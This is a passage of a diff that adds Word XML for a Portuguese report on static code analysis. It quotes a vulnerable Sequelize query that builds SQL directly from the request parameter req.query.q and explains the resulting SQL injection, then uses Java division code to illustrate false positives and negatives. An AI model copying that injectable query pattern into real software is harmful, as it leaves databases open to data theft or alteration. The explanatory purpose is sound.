+        </w:rPr>
+        <w:t>.q</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> === 'undefined</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>' ?</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'' : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>req.query.q</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>consome diretamente o criteria através do user input da query e utiliza o mesmo sem qualquer tipo de sanitização através da query de sink que é executada na DB:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>models.sequelize</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">`SELECT * FROM Products WHERE ((name LIKE '%${criteria}%' OR description LIKE '%${criteria}%') AND </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>deletedAt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IS NULL) ORDER BY name`)” </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>permtindo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> assim um malfeitor injetar comandos SQL maliciosos, quer seja para alterar ou extrair informações da DB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Falsos positivos e negativos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Um falso positivo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ocorre quando uma ferramenta de análise estática indica um problema que não existe, pode acontecer, por exemplo, quando uma validação de código não está a ser corretamente identificada pela ferramenta, exemplo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>public class Division {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static double </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>double a, double b) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (b == 0) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/ aqui exsite uma </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>proteção</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mas não está a ser validada pela ferramenta</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            throw new IllegalArgumentException("Não é possível dividir por zero");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return a / b;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> // o que pode causar que este método/linha seja um falso positivo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>main(String[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 2)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 0)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>No entanto um falso negativo ocorre quando a ferramenta não apanha uma vulnerabiliade real no código, utilizando o mesmo exemplo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>public class Division {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static double </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>double a, double b) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return a / </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>b;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    public static void </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>main(String[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>args</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 2)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>System.out.println</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>divide(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>4, 0)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
